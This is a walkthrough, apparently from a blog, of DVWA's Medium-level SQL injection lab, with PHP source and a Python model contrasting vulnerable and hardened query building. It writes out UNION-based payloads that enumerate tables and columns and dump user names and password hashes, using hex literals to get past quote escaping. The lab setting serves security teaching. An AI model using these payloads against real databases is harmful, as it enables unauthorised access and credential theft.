DVWA -- SQL Injection -- Low
Level: Medium
At the Medium level the code passes the input through mysqli_real_escape_string(), which escapes the special characters \x00, \n, \r, \, ', " and \x1a, and the front end replaces the text box with a drop-down list in the hope of constraining what the user can enter. The drop-down only restricts what the browser sends: we can still intercept the request, change the parameter, and submit a crafted query. So this level needs an intercepting proxy such as Burp Suite (with the browser's proxy settings pointed at it), or a browser add-on such as HackBar to resend the POST request.
1. Look at the POST request
2. Resend the POST request with HackBar
Open HackBar --> Load URL --> tick Post Data and enter id=3&Submit=Submit
3. Submit id=1' and the page returns a MySQL syntax error. The escaping turns the quote into \', and because $id is not wrapped in quotes in the query, the parameter is used as a bare number: this is numeric injection. The payloads below therefore need no quote to break out of a string, and they must avoid quotes altogether, since any quote would be escaped.
4. Find the number of columns in the SELECT with ORDER BY
From the results below, the query returns 2 columns:
id=1 order by 2 &Submit=Submit #succeeds
id=1 order by 3 &Submit=Submit #fails
id=1 order by 4 &Submit=Submit #fails
5. Find which columns are echoed back
id=1 union select 1,2 &Submit=Submit
6. Get the current database name and server version (and 1=2 suppresses the real row so only the UNION row is shown)
id=1 and 1=2 union select database(),version() &Submit=Submit
7. List the tables in the current database (group_concat() packs them into one echoed column)
id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() &Submit=Submit
8. List the columns of the users table
The table name is a string, and a quoted string literal will be broken by the escaping, so the quotes have to be avoided. MySQL accepts a hex literal (0x...) as a string, which needs no quotes at all.
String to hex conversion: https://zixuephp.net/tool-str-hex.html
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' &Submit=Submit
This fails because the single quotes are escaped to \':
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\'users\'' at line 1
Replace 'users' with its hex form 0x7573657273 (the ASCII bytes of "users") and comment out the trailing semicolon:
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 # &Submit=Submit
9. Dump the user names and password hashes
id=1 and 1=2 union select user,password from users # &Submit=Submit
10. Crack the password hashes (DVWA stores them as unsalted MD5)
Server-side source
```php
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    // Escapes \x00, \n, \r, \, ', " and \x1a. The value is still interpolated
    // below without surrounding quotes, so a quote-free payload reaches the
    // query unchanged: escaping does not help in a numeric context.
    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
    $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    // The raw mysqli_error() text is returned to the user; the step-3 probe relies on it.
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last = $row["last_name"];
        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>
```
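To tie the walkthrough (steps 3 to 9) to the source above, here is an added example, written for this page and not part of DVWA or the original post: a Python model of the Medium-level handler. It reimplements the character mapping of mysqli_real_escape_string() (assumption: the connection is not in NO_BASCKSLASH_ESCAPES mode, so the seven characters listed in the step description are escaped with a backslash), builds the query with the same format string the PHP uses, and runs the walkthrough's payloads through it so you can see which ones survive the escaping, why the 'users' probe breaks and why 0x7573657273 works. A hardened variant that treats the id as an integer is included for contrast. The function names escape, build_query, build_query_hardened, hex_literal and walkthrough are mine; the payloads are the ones from the steps above.

```python
# Added example (not DVWA's own code): a model of the Medium-level SQLi handler.
# Assumption: the MySQL connection is not in NO_BACKSLASH_ESCAPES mode, so
# mysqli_real_escape_string() maps the seven characters below to backslash forms.

# Characters mysqli_real_escape_string() escapes, and what each becomes.
_ESCAPES = {
    "\x00": "\\0",
    "\n": "\\n",
    "\r": "\\r",
    "\\": "\\\\",
    "'": "\\'",
    '"': '\\"',
    "\x1a": "\\Z",
}


def escape(value: str) -> str:
    """Model of mysqli_real_escape_string(): escape the seven special chars."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_query(user_id: str) -> str:
    """The vulnerable Medium-level query: escaped, but interpolated unquoted."""
    return f"SELECT first_name, last_name FROM users WHERE user_id = {escape(user_id)};"


def build_query_hardened(user_id: str) -> str:
    """Hardened variant: user_id is a number, so parse it as one.

    int() raises ValueError on anything that does not parse as an integer,
    which is the effect of PHP's intval() plus a check, or of a prepared
    statement with an integer bind. Every injection payload below is rejected.
    """
    return f"SELECT first_name, last_name FROM users WHERE user_id = {int(user_id)};"


def hex_literal(s: str) -> str:
    """Encode a string as a MySQL 0x... hex literal, which needs no quotes."""
    return "0x" + s.encode().hex()


def walkthrough() -> list[tuple[str, str]]:
    """Return (payload, resulting SQL) for the payloads used in steps 3 to 9."""
    table_hex = hex_literal("users")  # "0x7573657273", as used in step 8
    payloads = [
        "1'",                                   # step 3: quote is escaped -> syntax error
        "1 order by 2",                         # step 4: column count
        "1 union select 1,2",                   # step 5: echoed positions
        "1 and 1=2 union select database(),version()",                 # step 6
        "1 and 1=2 union select 1,group_concat(table_name) "
        "from information_schema.tables where table_schema=database()",  # step 7
        "1 and 1=2 union select 1,group_concat(column_name) "
        "from information_schema.columns where table_name='users'",     # step 8, breaks
        "1 and 1=2 union select 1,group_concat(column_name) "
        f"from information_schema.columns where table_name={table_hex} #",  # step 8, works
        "1 and 1=2 union select user,password from users #",            # step 9
    ]
    return [(p, build_query(p)) for p in payloads]


if __name__ == "__main__":
    for payload, sql in walkthrough():
        print(f"payload: {payload}\n    sql: {sql}\n")
    for payload in ("1", "1 union select 1,2"):
        try:
            print("hardened:", build_query_hardened(payload))
        except ValueError:
            print(f"hardened: rejected {payload!r}")
```

Run it with python3 and compare the printed SQL for the two step-8 payloads: the quoted one ends in table_name=\'users\', exactly the fragment in the MariaDB error above, while the hex one passes through untouched because it contains none of the escaped characters. The hardened builder rejects every payload except a plain number, which is the property escaping alone cannot give you in a numeric context.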